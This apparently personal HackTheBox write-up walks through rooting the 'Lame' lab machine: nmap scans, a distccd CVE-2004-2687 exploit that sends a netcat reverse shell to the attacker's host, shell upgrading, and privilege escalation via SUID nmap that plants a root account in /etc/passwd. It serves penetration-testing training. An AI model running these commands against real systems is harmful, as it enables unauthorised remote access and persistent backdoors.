Content
Welcome to the Lame writeup from HTB
tags:
Welcome to the Lame writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Lame
tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux
Link: Click here
Enumeration
Nmap
At first, we need to discover the open ports
# nmap -p- -T4 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-12 16:46 CET
Nmap scan report for 10.10.10.3
Host is up (0.093s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
Nmap done: 1 IP address (1 host up) scanned in 91.52 secondsAnd now, let's explore deeper these ports.
# nmap -A -Pn -p 21,22,139,445,3632 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-12 16:48 CET
Nmap scan report for 10.10.10.3
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.9
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: broadband router|remote management|WAP|printer|general purpose|power-device
Running (JUST GUESSING): Arris embedded (92%), Dell embedded (92%), Linksys embedded (92%), Tranzeo embedded (92%), Xerox embedded (92%), Linux 2.4.X|2.6.X (92%), Dell iDRAC 6 (92%), Raritan embedded (92%)
OS CPE: cpe:/h:dell:remote_access_card:6 cpe:/h:linksys:wet54gs5 cpe:/h:tranzeo:tr-cpq-19f cpe:/h:xerox:workcentre_pro_265 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:2.6 cpe:/o:dell:idrac6_firmware
Aggressive OS guesses: Arris TG862G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Linux 2.6.22 (92%), Linux 2.6.27 - 2.6.28 (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Raritan Dominion PX DPXR20-20L power control unit (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h35m06s, deviation: 3h32m11s, median: 5m03s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-03-12T10:54:06-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 92.90 ms 10.10.14.1
2 92.94 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.84 secondsOk, as we can see, there is a distccd daemon running. Searchin in google, we can find a RCE exploit for it.
Exploitation
To get a shell, we only need to run a listener in a terminal and execute the exploit in another terminal.
# python distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "10.10.14.9 8787 -e /bin/sh"
[OK] Connected to remote service
--- BEGIN BUFFER ---
#: 10.10.14.9: command not found
--- END BUFFER ---
[OK] Done.
root [EvilBook] (10.10.14.9) /tmp
# python distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "nc 10.10.14.9 8787 -e /bin/sh"
[OK] Connected to remote service
[KO] Socket Timeout# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.3] 51687
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)And now, we can upgrade our shell with:
python -c "import pty; pty.spawn('/bin/bash')"
ctl+z
stty raw -echo
fg
reset
screen
export TERM=screen;export SHELL=/bin/bash;stty rows 60 columns 235
/bin/bashTo get the user flag, we only need to browse the makis home.
daemon@lame:/home/makis$ cat user.txt
CENSORED_FLAGPost exploitation
Enumeration
SUID
Between some SUID binaries, we can find that nmap is set as SUID.
daemon@lame:/home/makis$ find / -perm /4000 2>/dev/null
.......................................................
.......................................................
/usr/bin/nmap
.......................................................
.......................................................Privilege escalation
Is well known that nmap has an interactive mode and we can run shell commands inside it as root because it is setted as SUID.
daemon@lame:/home/makis$ nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
root
system() execution of command failed
nmap>As we can see, we can execute commands as root. Let's inject a user in /etc/passwd to login as root with it.
nmap> !echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd
system() execution of command failed
nmap>
daemon@lame:/home/makis$ su x4v1l0k
Password:
root@lame:/home/makis# id
uid=0(root) gid=0(root) groups=0(root)
root@lame:/home/makis# cat /root/root.txt
CENSORED_FLAG
root@lame:/home/makis#Can you help me share it?
